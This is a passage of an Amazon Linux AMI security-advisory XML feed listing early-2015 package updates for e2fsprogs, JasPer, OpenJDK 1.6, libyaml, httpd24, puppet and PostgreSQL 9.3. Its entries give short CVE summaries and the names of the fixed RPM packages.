date="2015-02-11 19:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0247:
A heap-based buffer overflow flaw was found in e2fsprogs. A specially crafted Ext2/3/4 file system could cause an application using the ext2fs library (for example, fsck) to crash or, possibly, execute arbitrary code.
1187032:
CVE-2015-0247 e2fsprogs: ext2fs_open2() missing first_meta_bg boundary check leading to heap buffer overflow (oCERT-015-002)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0247" title="" id="CVE-2015-0247" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="e2fsprogs-libs" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-libs-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libcom_err" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-static-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libss-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-devel-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-debuginfo-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-devel-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libcom_err-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-devel-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libss-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-libs" 
version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-libs-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-static-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-devel-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-debuginfo-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="libcom_err-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-devel-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="libcom_err" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="libss-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libss-devel-1.42.12-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-479</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-479: important priority package update for jasper</title><issued date="2015-02-11 19:37:00" /><updated date="2015-02-11 19:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8158:
An unrestricted stack memory use flaw was found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2014-8157:
An off-by-one flaw, leading to a heap-based buffer overflow, was found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8157" title="" id="CVE-2014-8157" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8158" title="" id="CVE-2014-8158" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0074.html" title="" id="RHSA-2015:0074" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/jasper-devel-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-16.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-480</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-480: important priority package update for java-1.6.0-openjdk</title><issued date="2015-02-11 19:38:00" /><updated date="2015-02-11 19:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0412:
Multiple improper permission check issues were discovered in the JAX-WS and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0410:
A flaw was found in the way the DER (Distinguished Encoding Rules) decoder in the Security component in OpenJDK handled negative length values. A specially crafted, DER-encoded input could cause a Java application to enter an infinite loop when decoded.
CVE-2015-0408:
Multiple improper permission check issues were discovered in the JAX-WS and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0407:
An information leak flaw was found in the Swing component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0395:
A flaw was found in the way the Hotspot garbage collector handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack.
CVE-2014-6601:
A flaw was found in the way the Hotspot component in OpenJDK verified bytecode from the class files. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2014-6593:
It was discovered that the SSL/TLS implementation in the JSSE component in OpenJDK failed to properly check whether the ChangeCipherSpec was received during the SSL/TLS connection handshake. An MITM attacker could possibly use this flaw to force a connection to be established without encryption being enabled.
CVE-2014-6591:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6587:
A NULL pointer dereference flaw was found in the MulticastSocket implementation in the Libraries component of OpenJDK. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
CVE-2014-6585:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-3566:
A flaw was found in the way the SSL 3.0 protocol handled padding bytes when decrypting messages that were encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw could possibly allow a man-in-the-middle (MITM) attacker to decrypt portions of the cipher text using a padding oracle attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6585" title="" id="CVE-2014-6585" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6587" title="" id="CVE-2014-6587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6591" title="" id="CVE-2014-6591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6593" title="" id="CVE-2014-6593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6601" title="" id="CVE-2014-6601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395" title="" id="CVE-2015-0395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0407" title="" id="CVE-2015-0407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0408" title="" id="CVE-2015-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0410" title="" id="CVE-2015-0410" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0412" title="" id="CVE-2015-0412" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0085.html" title="" id="RHSA-2015:0085" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-481</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-481: medium priority package update for libyaml</title><issued date="2015-02-11 19:38:00" /><updated date="2015-02-11 19:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9130:
An assertion failure was found in the way the libyaml library parsed wrapped strings. An attacker able to load specially crafted YAML input into an application using libyaml could cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9130" title="" id="CVE-2014-9130" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0100.html" title="" id="RHSA-2015:0100" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libyaml" version="0.1.6" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-0.1.6-6.7.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.6" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-devel-0.1.6-6.7.amzn1.x86_64.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-debuginfo-0.1.6-6.7.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.6" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-devel-0.1.6-6.7.amzn1.i686.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-debuginfo-0.1.6-6.7.amzn1.i686.rpm</filename></package><package name="libyaml" version="0.1.6" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-0.1.6-6.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-482</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-482: medium priority package update for perl-YAML-LibYAML</title><issued date="2015-02-11 19:39:00" /><updated date="2015-02-11 19:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9130:
An assertion failure was found in the way the libyaml library parsed wrapped strings. An attacker able to load specially crafted YAML input into an application using libyaml could cause the application to crash.
1169369:
CVE-2014-9130 libyaml: assert failure when processing wrapped strings
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9130" title="" id="CVE-2014-9130" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-YAML-LibYAML-debuginfo" version="0.59" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.59-1.16.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.59" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-0.59-1.16.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.59" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-0.59-1.16.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML-debuginfo" version="0.59" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.59-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-483</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-483: low priority package update for httpd24</title><issued date="2015-02-12 10:57:00" /><updated date="2015-02-12 11:32:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8109:
mod_lua.c in the mod_lua module in the Apache HTTP Server 2.3.x and 2.4.x through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory.
1174077:
CVE-2014-8109 httpd: LuaAuthzProvider argument handling issue
CVE-2014-3583:
The handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers.
1163555:
CVE-2014-3583 httpd: mod_proxy_fcgi handle_headers() buffer over read
CVE-2014-3581:
A NULL pointer dereference flaw was found in the way the mod_cache httpd module handled Content-Type headers. A malicious HTTP server could cause the httpd child process to crash when the Apache HTTP server was configured to proxy to a server with caching enabled.
1149709:
CVE-2014-3581 httpd: NULL pointer dereference in mod_cache if Content-Type has empty value
CVE-2013-5704:
The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass "RequestHeader unset" directives by placing a header in the trailer portion of data sent with chunked transfer coding. NOTE: the vendor states "this is not a security issue in httpd as such."
A flaw was found in the way httpd handled HTTP Trailer headers when processing requests using chunked encoding. A malicious client could use Trailer headers to set additional HTTP headers after header processing was performed by other modules. This could, for example, lead to a bypass of header restrictions defined with mod_headers.
1082903:
CVE-2013-5704 httpd: bypass of mod_headers rules via chunked requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5704" title="" id="CVE-2013-5704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3581" title="" id="CVE-2014-3581" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3583" title="" id="CVE-2014-3583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8109" title="" id="CVE-2014-8109" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.10" release="15.58.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.10-15.58.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="15.58.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.10" release="15.58.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="15.58.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-devel-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.10" release="15.58.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="15.58.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.10-15.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-484</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-484: medium priority package update for puppet</title><issued date="2015-02-12 15:13:00" /><updated date="2015-02-12 15:16:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3248:
Untrusted search path vulnerability in Puppet Enterprise 2.8 before 2.8.7, Puppet before 2.7.26 and 3.x before 3.6.2, Facter 1.6.x and 2.x before 2.0.2, Hiera before 1.3.4, and Mcollective before 2.5.2, when running with Ruby 1.9.1 or earlier, allows local users to gain privileges via a Trojan horse file in the current working directory, as demonstrated using (1) rubygems/defaults/operating_system.rb, (2) Win32API.rb, (3) Win32API.so, (4) safe_yaml.rb, (5) safe_yaml/deep.rb, or (6) safe_yaml/deep.so; or (7) operatingsystem.rb, (8) operatingsystem.so, (9) osfamily.rb, or (10) osfamily.so in puppet/confine.
1101346:
CVE-2014-3248 puppet: Ruby modules could be loaded from the current working directory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3248" title="" id="CVE-2014-3248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-server" version="2.7.25" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet-server-2.7.25-1.4.amzn1.noarch.rpm</filename></package><package name="puppet" version="2.7.25" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet-2.7.25-1.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-485</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-485: medium priority package update for postgresql93</title><issued date="2015-02-25 20:34:00" /><updated date="2015-02-25 20:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0244:
A flaw was found in the way PostgreSQL handled certain errors that were generated during protocol synchronization. An authenticated database user could use this flaw to inject queries into an existing connection.
1188694:
CVE-2015-0244 postgresql: loss of frontend/backend protocol synchronization after an error
CVE-2015-0243:
A stack-buffer overflow flaw was found in PostgreSQL's pgcrypto module. An authenticated database user could use this flaw to cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
1188689:
CVE-2015-0243 postgresql: buffer overflow flaws in contrib/pgcrypto
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0243" title="" id="CVE-2015-0243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0244" title="" id="CVE-2015-0244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-docs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package 
name="postgresql93-debuginfo" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.6-1.56.amzn1.i686.rpm</filename></package><package 
